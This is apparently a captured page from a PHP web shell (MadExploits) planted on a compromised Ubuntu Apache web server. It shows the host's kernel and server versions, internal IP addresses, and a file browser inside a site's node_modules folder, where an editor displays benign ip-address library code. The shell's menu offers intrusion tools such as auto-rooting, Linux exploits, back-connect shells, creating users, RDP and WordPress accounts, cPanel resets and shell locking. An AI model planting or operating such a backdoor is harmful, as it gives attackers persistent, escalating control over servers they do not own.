Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
ip-address /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
v4
[ DIR ]
drwxrwxr-x
v6
[ DIR ]
drwxrwxr-x
address-error.ts
263
B
-rw-rw-r--
common.ts
728
B
-rw-rw-r--
ip-address.ts
260
B
-rw-rw-r--
ipv4.ts
8.69
KB
-rw-rw-r--
ipv6.ts
30.32
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common.ts
import { Address4 } from './ipv4'; import { Address6 } from './ipv6'; export interface ReverseFormOptions { omitSuffix?: boolean; } export function isInSubnet(this: Address4 | Address6, address: Address4 | Address6) { if (this.subnetMask < address.subnetMask) { return false; } if (this.mask(address.subnetMask) === address.mask()) { return true; } return false; } export function isCorrect(defaultBits: number) { return function (this: Address4 | Address6) { if (this.addressMinusSuffix !== this.correctForm()) { return false; } if (this.subnetMask === defaultBits && !this.parsedSubnet) { return true; } return this.parsedSubnet === String(this.subnetMask); }; }
Close